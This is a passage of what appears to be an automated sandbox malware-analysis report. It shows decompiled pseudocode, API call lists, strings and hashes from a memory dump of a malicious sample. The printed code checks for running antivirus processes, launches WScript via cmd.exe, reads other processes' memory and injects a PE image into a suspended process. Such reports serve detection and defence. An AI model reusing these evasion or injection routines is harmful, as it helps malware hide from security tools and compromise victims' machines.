						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == 0) {
							goto L18;
						}
						_t75 =  *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0));
						if( *((intOrPtr*)(_t80 + _t79 * 4 - 0x16f0)) == GetCurrentProcessId()) {
							goto L18;
						}
						_t48 = E013C29E0(_t71, 0x13c0000, _t75,  &_v740, 0x288,  &_v8, E013C6CA0);
						_t82 = _t82 + 0x18;
						if(_t48 != 0 && _v8 != 0) {
							goto L24;
						}
						L18:
						_t79 = _t79 + 1;
					} while (_t79 < _t70);
					_t74 = _a4;
					goto L22;
				}
				_t61 = E013C7EF0("vsserv.exe");
				_t84 = _t84 + 4;
				if(_t61 != 0) {
					goto L10;
				}
				_t62 = E013C7EF0("cfp.exe");
				_t84 = _t84 + 4;
				if(_t62 != 0) {
					goto L10;
				}
				_t63 = E013C7EF0("ccavsrv.exe");
				_t84 = _t84 + 4;
				if(_t63 != 0) {
					goto L10;
				}
				_t64 = E013C7EF0("cmdagent.exe");
				_t84 = _t84 + 4;
				if(_t64 != 0) {
					goto L10;
				}
				_t65 = E013C7EF0("avp.exe");
				_t84 = _t84 + 4;
				if(_t65 != 0) {
					goto L10;
				}
				_t66 = E013C7EF0("avpui.exe");
				_t84 = _t84 + 4;
				if(_t66 != 0) {
					goto L10;
				}
				_t67 = E013C7EF0("ksde.exe");
				_t82 = _t84 + 4;
				if(_t67 == 0) {
					goto L22;
				}
				goto L10;
			}

0x013c6a40
0x013c6a58
0x013c6a68
0x013c6a72
0x013c6a85
0x013c6a8a
0x013c6a95
0x013c6a9b
0x013c6aa0
0x013c6aa5
0x013c6c9a
0x013c6c9a
0x013c6aab
0x013c6aac
0x013c6ab4
0x013c6c0e
0x013c6c16
0x013c6c21
0x013c6c2a
0x013c6c2e
0x013c6c3b
0x013c6c4c
0x013c6c52
0x013c6c5c
0x013c6c7e
0x013c6c8d
0x013c6c92
0x013c6c92
0x013c6c94
0x00000000
0x013c6c95
0x013c6abf
0x013c6ac4
0x013c6ac9
0x013c6b46
0x013c6b53
0x013c6b58
0x013c6b59
0x013c6bd6
0x013c6bf8
0x013c6bfd
0x013c6c02
0x00000000
0x00000000
0x00000000
0x00000000
0x013c6c02
0x013c6b5b
0x013c6b62
0x013c6b64
0x013c6b69
0x00000000
0x00000000
0x013c6b6f
0x013c6b73
0x00000000
0x00000000
0x013c6b80
0x013c6b88
0x00000000
0x00000000
0x013c6b8a
0x013c6b99
0x00000000
0x00000000
0x013c6bb6
0x013c6bbb
0x013c6bc0
0x00000000
0x00000000
0x013c6bcc
0x013c6bcc
0x013c6bcd
0x013c6bd1
0x00000000
0x013c6bd1
0x013c6ad0
0x013c6ad5
0x013c6ada
0x00000000
0x00000000
0x013c6ae1
0x013c6ae6
0x013c6aeb
0x00000000
0x00000000
0x013c6af2
0x013c6af7
0x013c6afc
0x00000000
0x00000000
0x013c6b03
0x013c6b08
0x013c6b0d
0x00000000
0x00000000
0x013c6b14
0x013c6b19
0x013c6b1e
0x00000000
0x00000000
0x013c6b25
0x013c6b2a
0x013c6b2f
0x00000000
0x00000000
0x013c6b36
0x013c6b3b
0x013c6b40
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 013C7ED0: GetFileAttributesW.KERNEL32(?,?,013C31D3,013C47C4,013C47C4,\System32\wuapp.exe,013C47C4,?,00000000), ref: 013C7ED6

GetCurrentProcessId.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 013C6B91

Part of subcall function 013C7EF0: Process32First.KERNEL32(00000000,00000128,00000001,00000002,00000000,?), ref: 013C7F24
Part of subcall function 013C7EF0: Process32Next.KERNEL32(00000000,00000128,00000000,?), ref: 013C7F48
Part of subcall function 013C7EF0: Process32Next.KERNEL32(00000000,00000128,00000000,00000128,00000000,?), ref: 013C7F6D
Part of subcall function 013C7EF0: CloseHandle.KERNEL32(00000000,00000000,00000128,00000000,?), ref: 013C7F77

Part of subcall function 013C7EF0: CloseHandle.KERNEL32(00000000,00000000,?), ref: 013C7F86

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 013C6C7E
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,73BCF7F0,00000000), ref: 013C6C8D
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,73BCF7F0,00000000), ref: 013C6C92

Part of subcall function 013C7EF0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?), ref: 013C7F08

Strings

cfp.exe, xrefs: 013C6ADC
cmd.exe /C WScript ", xrefs: 013C6C24
bdagent.exe, xrefs: 013C6ABA
ccavsrv.exe, xrefs: 013C6AED
avp.exe, xrefs: 013C6B0F
vsserv.exe, xrefs: 013C6ACB
avpui.exe, xrefs: 013C6B20
cmdagent.exe, xrefs: 013C6AFE
ksde.exe, xrefs: 013C6B31

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$Process32$CreateNextProcess$AttributesCurrentFileFirstSnapshotToolhelp32
String ID: avp.exe$avpui.exe$bdagent.exe$ccavsrv.exe$cfp.exe$cmd.exe /C WScript "$cmdagent.exe$ksde.exe$vsserv.exe
API String ID: 3996573972-1880040858
Opcode ID: 400ece419c0c4eb40b9e4bf3f456235e0b1ba08a597b31e86a0c234b2a158b92
Instruction ID: b5dfd7d998d83b69f8fb39177a629e85c08413fbda63ae88a024936dba66041c
Opcode Fuzzy Hash: 400ece419c0c4eb40b9e4bf3f456235e0b1ba08a597b31e86a0c234b2a158b92
Instruction Fuzzy Hash: E951CDB1D4020A66FF209BA9DD47FAA726D9F14FCCF04006CED04A2281FB61EE558B65

Uniqueness

Uniqueness Score: -1.00%

Function 013C5E60, Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 300
sleepprocessmemoryCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E013C5E60(void* __ecx, signed int __edx, void* __eflags) {
				intOrPtr _v8;
				signed int _v16;
				signed int _v20;
				void* _v24;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v44;
				char _v48;
				signed int _v56;
				char _v60;
				char _v132;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1324;
				char _v1372;
				signed int _t99;
				int _t107;
				void* _t109;
				void* _t116;
				intOrPtr _t117;
				signed int _t118;
				signed int _t122;
				void* _t132;
				void* _t145;
				void* _t151;
				void* _t153;
				void* _t154;
				signed int _t159;
				void* _t173;
				intOrPtr _t174;
				signed int _t175;
				signed int _t176;
				intOrPtr* _t181;
				signed int _t182;
				intOrPtr* _t185;
				signed int _t188;
				intOrPtr* _t192;
				void* _t199;
				void* _t204;
				void* _t205;
				void* _t208;
				void* _t209;
				void* _t210;
				void* _t223;
				signed int _t225;

				_t175 = __edx;
				_t154 = __ecx;
				_t153 = _t199;
				_v8 =  *((intOrPtr*)(_t153 + 4));
				E013C1BB0( &_v1372, 0, 0x4d0);
				_t185 =  *((intOrPtr*)(_t153 + 8));
				_t204 = (_t199 - 0x00000008 & 0xfffffff0) + 4 - 0x558 + 0xc;
				_v1324 = 0x100002;
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x30], xmm0");
				_t215 =  *_t185 - 0x5a4d;
				if( *_t185 != 0x5a4d) {
					E013C1CE0("0125789244697858", 0x10, _t185,  *((intOrPtr*)(_t153 + 0xc)));
					_t204 = _t204 + 0x10;
				}
				_t99 = E013C1E50(_t154, _t175, _t215, "ntdll.dll");
				_v20 = _t99;
				_t205 = _t204 + 4;
				_v16 = _t175;
				_t156 = _t99 | _t175;
				if((_t99 | _t175) == 0 ||  *_t185 != 0x5a4d) {
					L34:
					__eflags = 0;
					return 0;
				} else {
					_t181 =  *((intOrPtr*)(_t185 + 0x3c)) + _t185;
					if( *_t181 != 0x4550) {
						goto L34;
					} else {
						E013C1670( &_v132, 0, 0x44);
						E013C1670( &_v40, 0, 0x10);
						_t208 = _t205 + 0x18;
						_v132 = 0x44;
						_push( &_v40);
						_push( &_v132);
						_push(0);
						_push(0);
						if( *0x1591bb8 == 0) {
							_push(4);
						} else {
							_push(0x800000c);
						}
						_t107 = CreateProcessW(0,  *(_t153 + 0x10), 0, 0, 0, ??, ??, ??, ??, ??);
						_t220 = _t107;
						if(_t107 == 0) {
							goto L34;
						} else {
							_t109 = E013C61F0(_t156, _t175, _t220, _v20, _v16, _v36,  &_v1372);
							_t209 = _t208 + 0x10;
							_t221 = _t109;
							if(_t109 == 0) {
								L33:
								TerminateProcess(_v40, 0);
								CloseHandle(_v36);
								CloseHandle(_v40);
								goto L34;
							} else {
								asm("adc eax, 0x0");
								_t116 = E013C6250(_v1236 + 0x10, _t175, _t221, _v20, _v16, _v40, _v1236 + 0x10, _v1232,  &_v60, 8,  &_v24);
								_t210 = _t209 + 0x20;
								if(_t116 == 0) {
									goto L33;
								} else {
									_t159 =  *((intOrPtr*)(_t181 + 0x34));
									_t176 = _v56;
									_t117 =  *((intOrPtr*)(_t181 + 0x30));
									_v20 = _t159;
									_t223 = _t176 - _t159;
									if(_t223 < 0) {
										L18:
										_t118 = E013C72C0(_t227, _v40,  *((intOrPtr*)(_t181 + 0x30)),  *((intOrPtr*)(_t181 + 0x34)),  *((intOrPtr*)(_t181 + 0x50)), 0x3000, 4);
										_v20 = _t118;
										_v16 = _t176;
										if((_t118 | _t176) == 0 || E013C74D0( &_v44, _t176, _v40, _t118, _t176, _t185,  *((intOrPtr*)(_t181 + 0x54)),  &_v44) == 0) {
											goto L33;
										} else {
											_t188 = _v20;
											if(E013C73C0(_v40, _t188, _v16,  *((intOrPtr*)(_t181 + 0x54)), 2,  &_v48) == 0) {
												goto L33;
											} else {
												_t122 =  *(_t181 + 0x14) & 0x0000ffff;
												_v24 = 0;
												if(0 >=  *(_t181 + 6)) {
													L27:
													asm("adc eax, 0x0");
													if(E013C74D0(_v1236 + 0x10, _t176, _v40, _v1236 + 0x10, _v1232, _t181 + 0x30, 8,  &_v44) == 0) {
														goto L33;
													} else {
														_t182 = _v16;
														_v1244 =  *((intOrPtr*)(_t181 + 0x28)) + _t188;
														asm("adc ecx, edi");
														_v1240 = 0;
														if(E013C7230(0, _t176, _v36,  &_v1372) == 0 || E013C71A0(0, _t176, _v36) == 0) {
															goto L33;
														} else {
															Sleep(0x1388);
															_t132 = VirtualAlloc(0, 0x138, 0x3000, 4);
															_v24 = _t132;
															if(_t132 != 0) {
																E013C1BB0(_t132, 0, 0x138);
																E013C74D0(0, _t176, _v40, _t188, _t182, _v24, 0x138,  &_v16);
																VirtualFree(_v24, 0, 0x8000);
															}
															CloseHandle(_v36);
															CloseHandle(_v40);
															return _v32;
														}
													}
												} else {
													_t192 = _t181 + 0x2c + _t122;
													while(1) {
														asm("adc eax, [ebp-0x4]");
														if(E013C74D0( *((intOrPtr*)(_t192 - 8)) + _v20, _t176, _v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *_t192 +  *((intOrPtr*)(_t153 + 8)),  *((intOrPtr*)(_t192 - 4)),  &_v44) == 0) {
															goto L33;
														}
														_t145 = E013C6300( *((intOrPtr*)(_t192 + 0x10)));
														_t210 = _t210 + 4;
														asm("adc eax, [ebp-0x4]");
														if(E013C73C0(_v40,  *((intOrPtr*)(_t192 - 8)) + _v20, 0,  *((intOrPtr*)(_t192 - 0xc)), _t145,  &_v48) == 0) {
															goto L33;
														} else {
															_t192 = _t192 + 0x28;
															_t173 = _v24 + 1;
															_v24 = _t173;
															if(_t173 < ( *(_t181 + 6) & 0x0000ffff)) {
																continue;
															} else {
																_t188 = _v20;
																goto L27;
															}
														}
														goto L35;
													}
													goto L33;
												}
											}
										}
									} else {
										_t174 = _v60;
										if(_t223 > 0 || _t174 >= _t117) {
											_v16 =  *((intOrPtr*)(_t181 + 0x50));
											_v16 = _v16 +  *((intOrPtr*)(_t181 + 0x30));
											_t185 =  *((intOrPtr*)(_t153 + 8));
											asm("adc eax, [ebp-0x8]");
											_t225 = _t176;
											if(_t225 > 0 || _t225 >= 0 && _t174 > _v16) {
												goto L18;
											} else {
												_t151 = E013C7120(_t176, _v40, _t174, _t176);
												_t227 = _t151;
												if(_t151 != 0) {
													goto L33;
												} else {
													goto L18;
												}
											}
										} else {
											goto L18;
										}
									}
								}
							}
						}
					}
				}
				L35:
			}

0x013c5e60
0x013c5e60
0x013c5e61
0x013c5e70
0x013c5e8c
0x013c5e91
0x013c5e99
0x013c5e9c
0x013c5ea6
0x013c5ea9
0x013c5eae
0x013c5eb1
0x013c5ebe
0x013c5ec3
0x013c5ec3
0x013c5ecb
0x013c5ed2
0x013c5ed5
0x013c5ed8
0x013c5edb
0x013c5edd
0x013c61de
0x013c61df
0x013c61e8
0x013c5eec
0x013c5eef
0x013c5ef7
0x00000000
0x013c5efd
0x013c5f05
0x013c5f12
0x013c5f17
0x013c5f1a
0x013c5f2b
0x013c5f2f
0x013c5f30
0x013c5f32
0x013c5f34
0x013c5f3d
0x013c5f36
0x013c5f36
0x013c5f36
0x013c5f4a
0x013c5f50
0x013c5f52
0x00000000
0x013c5f58
0x013c5f68
0x013c5f6d
0x013c5f70
0x013c5f72
0x013c61c3
0x013c61c8
0x013c61d7
0x013c61dc
0x00000000
0x013c5f78
0x013c5f91
0x013c5f9f
0x013c5fa4
0x013c5fa9
0x00000000
0x013c5faf
0x013c5faf
0x013c5fb2
0x013c5fb5
0x013c5fb8
0x013c5fbb
0x013c5fbd
0x013c5ff9
0x013c600c
0x013c6013
0x013c6018
0x013c601b
0x00000000
0x013c603b
0x013c603b
0x013c6055
0x00000000
0x013c605b
0x013c605b
0x013c6061
0x013c606c
0x013c60e2
0x013c60fb
0x013c610a
0x00000000
0x013c6110
0x013c6115
0x013c611a
0x013c612a
0x013c612c
0x013c6139
0x00000000
0x013c614b
0x013c6150
0x013c6164
0x013c616a
0x013c616f
0x013c6179
0x013c6192
0x013c61a1
0x013c61a1
0x013c61b0
0x013c61b5
0x013c61c2
0x013c61c2
0x013c6139
0x013c606e
0x013c6071
0x013c6073
0x013c6088
0x013c6097
0x00000000
0x00000000
0x013c60a0
0x013c60a5
0x013c60b8
0x013c60c7
0x00000000
0x013c60cd
0x013c60d0
0x013c60d7
0x013c60d8
0x013c60dd
0x00000000
0x013c60df
0x013c60df
0x00000000
0x013c60df
0x013c60dd
0x00000000
0x013c60c7
0x00000000
0x013c6073
0x013c606c
0x013c6055
0x013c5fbf
0x013c5fbf
0x013c5fc2
0x013c5fce
0x013c5fd3
0x013c5fd6
0x013c5fd9
0x013c5fdc
0x013c5fde
0x00000000
0x013c5fe7
0x013c5fec
0x013c5ff1
0x013c5ff3
0x00000000
0x00000000
0x00000000
0x00000000
0x013c5ff3
0x00000000
0x00000000
0x00000000
0x013c5fc2
0x013c5fbd
0x013c5fa9
0x013c5f72
0x013c5f52
0x013c5ef7
0x00000000

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 013C5F4A
Sleep.KERNEL32(00001388,?,?,?,?,?,?,?,00000008,?,?,?,?,?,00000002,?), ref: 013C6150
VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004,?,?,?,?,?,?,?,?,00003000,00000004), ref: 013C6164
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00000000,00000138,?,?,00003000,00000004), ref: 013C61A1
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 013C61B0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00003000,00000004), ref: 013C61B5

Part of subcall function 013C74D0: GetCurrentProcess.KERNEL32(00000000,?,00000000,?,013CC038,?,00000000,?,?,00000000,?,00003000,00000040), ref: 013C74FF

Part of subcall function 013C73C0: GetCurrentProcess.KERNEL32(?,?,?,00000002,?,?,00000000,?,?,?,?,?,?), ref: 013C7429

TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,013C49E6,?), ref: 013C61C8
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,013C49E6,?), ref: 013C61D7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,013C49E6,?), ref: 013C61DC

Strings

ntdll.dll, xrefs: 013C5EC6
0125789244697858, xrefs: 013C5EB9

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: CloseHandleProcess$CurrentVirtual$AllocCreateFreeSleepTerminate
String ID: 0125789244697858$ntdll.dll
API String ID: 1806556286-2057982665
Opcode ID: f2ee226d68404cf662754d7e6190b7dacaadfffd34d361314685a90c821f26ed
Instruction ID: 87370cb277b5ef0efd1546d38473498888042a2f939667b50482d1c8b430d408
Opcode Fuzzy Hash: f2ee226d68404cf662754d7e6190b7dacaadfffd34d361314685a90c821f26ed
Instruction Fuzzy Hash: 9EB186B1E0020AFBEF149B98DC41FAEBBB9FF44709F144059EA04A6291E771AD54CF54

Uniqueness

Uniqueness Score: -1.00%

Function 013C5A50, Relevance: 16.6, APIs: 11, Instructions: 117
memoryCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E013C5A50(void* __ecx, void* _a4, void* _a8, long* _a12, long* _a16) {
				void* _v8;
				void* _t31;
				int _t32;
				int _t36;
				void* _t44;
				long _t46;
				void* _t56;
				void* _t60;

				 *_a12 = 0;
				 *_a16 = 0;
				_t56 = VirtualAlloc(0, 0x40, 0x3000, 4);
				if(_t56 == 0) {
					L3:
					return 0;
				} else {
					if(ReadProcessMemory(_a4, _a8, _t56, 0x40, 0) != 0) {
						if( *_t56 != 0x5a4d) {
							goto L2;
						} else {
							_v8 =  *((intOrPtr*)(_t56 + 0x3c));
							VirtualFree(_t56, 0, 0x8000);
							_t44 = VirtualAlloc(0, 0x18, 0x3000, 4);
							if(_t44 == 0) {
								L11:
								return 0;
							} else {
								_t31 = _a8 + _v8;
								_v8 = _t31;
								_t32 = ReadProcessMemory(_a4, _t31, _t44, 0x18, 0);
								_push(0x8000);
								_push(0);
								_push(_t44);
								if(_t32 == 0 ||  *_t44 != 0x4550) {
									L10:
									VirtualFree();
									goto L11;
								} else {
									VirtualFree();
									_t46 = ( *(_t44 + 0x14) & 0x0000ffff) + 0x18;
									_t60 = VirtualAlloc(0, _t46, 0x3000, 4);
									if(_t60 == 0) {
										goto L11;
									} else {
										_t36 = ReadProcessMemory(_a4, _v8, _t60, _t46, 0);
										_push(0x8000);
										_push(0);
										_push(_t60);
										if(_t36 != 0) {
											if( *_t60 != 0x4550) {
												goto L10;
											} else {
												 *_a12 =  *(_t60 + 0x50);
												 *_a16 =  *(_t60 + 0x28);
												VirtualFree(??, ??, ??);
												return 1;
											}
										} else {
											goto L10;
										}
									}
								}
							}
						}
					} else {
						L2:
						VirtualFree(_t56, 0, 0x8000);
						goto L3;
					}
				}
			}

0x013c5a61
0x013c5a73
0x013c5a7b
0x013c5a7f
0x013c5aa4
0x013c5aab
0x013c5a81
0x013c5a94
0x013c5ab4
0x00000000
0x013c5ab6
0x013c5ac8
0x013c5acb
0x013c5ada
0x013c5ade
0x013c5b49
0x013c5b51
0x013c5ae0
0x013c5ae3
0x013c5aef
0x013c5af2
0x013c5af8
0x013c5afd
0x013c5aff
0x013c5b02
0x013c5b47
0x013c5b47
0x00000000
0x013c5b0c
0x013c5b10
0x013c5b19
0x013c5b25
0x013c5b29
0x00000000
0x013c5b2b
0x013c5b35
0x013c5b3b
0x013c5b40
0x013c5b42
0x013c5b45
0x013c5b58
0x00000000
0x013c5b5a
0x013c5b60
0x013c5b68
0x013c5b6a
0x013c5b74
0x013c5b74
0x00000000
0x00000000
0x00000000
0x013c5b45
0x013c5b29
0x013c5b02
0x013c5ade
0x013c5a96
0x013c5a96
0x013c5a9e
0x00000000
0x013c5a9e
0x013c5a94

APIs

VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004,00005A4D,73B75B60,?,?,013C563B,?,00000000,00000000,00000000), ref: 013C5A79
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000040,00000000,?,?,013C563B,?,00000000,00000000,00000000), ref: 013C5A8C
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,013C563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 013C5A9E
VirtualFree.KERNEL32(00000000,00000000,00008000,013C49E6,?,?,013C563B,?,00000000,00000000,00000000), ref: 013C5ACB
VirtualAlloc.KERNEL32(00000000,00000018,00003000,00000004,?,?,013C563B,?,00000000,00000000,00000000), ref: 013C5AD8
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000018,00000000,?,?,013C563B,?,00000000,00000000,00000000), ref: 013C5AF2
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,013C563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 013C5B10
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,013C563B,?,00000000,00000000,00000000), ref: 013C5B1F
ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,013C563B,?,00000000,00000000,00000000), ref: 013C5B35
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,013C563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 013C5B47
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,013C563B,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 013C5B6A

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: Virtual$Free$AllocMemoryProcessRead
String ID:
API String ID: 1260273505-0
Opcode ID: 14550b3ca3ba4dc09f45fed5544c089ba51c551e8c9ad343d6310b041bd08097
Instruction ID: 776e26b4f8140a4e00cb2b0a280182df488b8622bc6e18c6ac5d2856204ecb4a
Opcode Fuzzy Hash: 14550b3ca3ba4dc09f45fed5544c089ba51c551e8c9ad343d6310b041bd08097
Instruction Fuzzy Hash: 33315E75741718BFEB319F99DC81F9A7BA8AF05B15F100059FB08AB1C0D7B1A9048FA4

Uniqueness

Uniqueness Score: -1.00%

Function 013C7FA0, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 56
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E013C7FA0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t22;

				_t22 = LoadLibraryA("Shell32.dll");
				if(_t22 == 0) {
					L8:
					return 0;
				} else {
					_t11 = GetProcAddress(_t22, "SHGetKnownFolderPath");
					if(_t11 == 0) {
						_t12 = GetProcAddress(_t22, "SHGetFolderPathW");
						if(_t12 == 0) {
							goto L7;
						} else {
							_push(_a4);
							_push(0);
							_push(0);
							_push(_a12);
							_push(0);
							if( *_t12() == 0) {
								goto L4;
							} else {
								goto L7;
							}
						}
					} else {
						_v8 = 0;
						_push( &_v8);
						_push(0);
						_push(0);
						_push(_a8);
						if( *_t11() != 0) {
							L7:
							FreeLibrary(_t22);
							goto L8;
						} else {
							E013C1A00(_a4, _v8);
							__imp__CoTaskMemFree(_v8);
							L4:
							FreeLibrary(_t22);
							return 1;
						}
					}
				}
			}

0x013c7fb0
0x013c7fb4
0x013c802f
0x013c8035
0x013c7fb6
0x013c7fbc
0x013c7fc4
0x013c800c
0x013c8014
0x00000000
0x013c8016
0x013c8016
0x013c8019
0x013c801b
0x013c801d
0x013c8020
0x013c8026
0x00000000
0x00000000
0x00000000
0x00000000
0x013c8026
0x013c7fc6
0x013c7fc9
0x013c7fd0
0x013c7fd1
0x013c7fd3
0x013c7fd5
0x013c7fdc
0x013c8028
0x013c8029
0x00000000
0x013c7fde
0x013c7fe4
0x013c7fef
0x013c7ff5
0x013c7ff6
0x013c8005
0x013c8005
0x013c7fdc
0x013c7fc4

APIs

LoadLibraryA.KERNEL32(Shell32.dll,00000000,?,?,013C461E,C:\ProgramData\LKBNMTFJgl,013CAAE0,00000023), ref: 013C7FAA
GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath,?,?,013C461E,C:\ProgramData\LKBNMTFJgl,013CAAE0,00000023), ref: 013C7FBC
CoTaskMemFree.OLE32(00000000,013CAAE0), ref: 013C7FEF
FreeLibrary.KERNEL32(00000000,?,?,013C461E,C:\ProgramData\LKBNMTFJgl,013CAAE0,00000023), ref: 013C7FF6
GetProcAddress.KERNEL32(00000000,SHGetFolderPathW,?,?,013C461E,C:\ProgramData\LKBNMTFJgl,013CAAE0,00000023), ref: 013C800C
FreeLibrary.KERNEL32(00000000,?,?,013C461E,C:\ProgramData\LKBNMTFJgl,013CAAE0,00000023), ref: 013C8029

Strings

SHGetFolderPathW, xrefs: 013C8006
SHGetKnownFolderPath, xrefs: 013C7FB6
Shell32.dll, xrefs: 013C7FA5

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary$AddressProc$LoadTask
String ID: SHGetFolderPathW$SHGetKnownFolderPath$Shell32.dll
API String ID: 2437428030-337183102
Opcode ID: 6a22ef75a6f3ae42e833009d2302bf0e2971e80fce09d9426fdb6052a34d544b
Instruction ID: 567181c9477058d9661809a82570e14613e5b9326c218356b8f588b606631343
Opcode Fuzzy Hash: 6a22ef75a6f3ae42e833009d2302bf0e2971e80fce09d9426fdb6052a34d544b
Instruction Fuzzy Hash: 9D01B531640629FBEB315F69DC0AB9E3FACEF08B49F000058FD04A5180EBB5EE109795

Uniqueness

Uniqueness Score: -1.00%

Function 013C6340, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 206memoryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 013C63BC
GetFileSizeEx.KERNEL32(00000000,00000000), ref: 013C644C
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?), ref: 013C6472
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013C64C0
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013C64F5
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013C6591
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 013C65BA

Strings

@, xrefs: 013C6531

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: Virtual$Free$File$AllocModuleNameSize
String ID: @
API String ID: 994213472-2766056989
Opcode ID: 8d3034195af0cedfa7bb3ac9d22cf46033482d4cc034fe3f26ad46ad9673fcb0
Instruction ID: b0d2f4fa472aa6b2e6ce3621436e79dddb9046595946e17134abace598abe2dc
Opcode Fuzzy Hash: 8d3034195af0cedfa7bb3ac9d22cf46033482d4cc034fe3f26ad46ad9673fcb0
Instruction Fuzzy Hash: A7714CB1A4021DABEF21CF94DC4AFEEBBB9FB08714F100159F604F9180DBB566488B95

Uniqueness

Uniqueness Score: -1.00%

Function 013C82B0, Relevance: 13.6, APIs: 9, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E013C82B0(intOrPtr _a4) {
				void* _v8;
				long _v12;
				void* _t20;
				void* _t27;
				void* _t34;
				void* _t37;
				void* _t38;

				_v8 = 0;
				_v12 = 0;
				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v8) == 0) {
					L4:
					return 0;
				} else {
					if(GetTokenInformation(_v8, 1, 0, 0,  &_v12) != 0 || GetLastError() == 0x7a) {
						_t20 = E013C15E0(_v12);
						_t38 = _t37 + 4;
						_t34 = _t20;
						if(GetTokenInformation(_v8, 1, _t34, _v12,  &_v12) == 0 || IsValidSid( *_t34) == 0) {
							_push(_t34);
							goto L8;
						} else {
							_t27 = E013C7AA0( *_t34, _a4);
							_t38 = _t38 + 8;
							_push(_t34);
							if(_t27 == 0) {
								L8:
								E013C1510();
								CloseHandle(_v8);
								return 0;
							} else {
								E013C1510();
								CloseHandle(_v8);
								return 1;
							}
						}
					} else {
						CloseHandle(_v8);
						goto L4;
					}
				}
			}

0x013c82b9
0x013c82c3
0x013c82d9
0x013c8306
0x013c830b
0x013c82db
0x013c82f0
0x013c8310
0x013c8315
0x013c8318
0x013c832f
0x013c833d
0x00000000
0x013c8356
0x013c835b
0x013c8360
0x013c8363
0x013c8366
0x013c833e
0x013c833e
0x013c8349
0x013c8355
0x013c8368
0x013c8368
0x013c8373
0x013c8382
0x013c8382
0x013c8366
0x013c82fd
0x013c8300
0x00000000
0x013c8300
0x013c82f0

APIs

GetCurrentProcess.KERNEL32(00000008,00000400), ref: 013C82CA
OpenProcessToken.ADVAPI32(00000000), ref: 013C82D1
GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 013C82E8
GetLastError.KERNEL32 ref: 013C82F2
CloseHandle.KERNEL32(00000000), ref: 013C8300
GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00000000), ref: 013C8327
IsValidSid.ADVAPI32(00000000), ref: 013C8333
CloseHandle.KERNEL32(00000000), ref: 013C8349
CloseHandle.KERNEL32(00000000), ref: 013C8373

Memory Dump Source

Source File: 0000000E.00000002.909418547.00000000013C0000.00000040.00000001.sdmp, Offset: 013C0000, based on PE: true

Yara matches

Similarity

API ID: CloseHandleToken$InformationProcess$CurrentErrorLastOpenValid
String ID:
API String ID: 2832165296-0
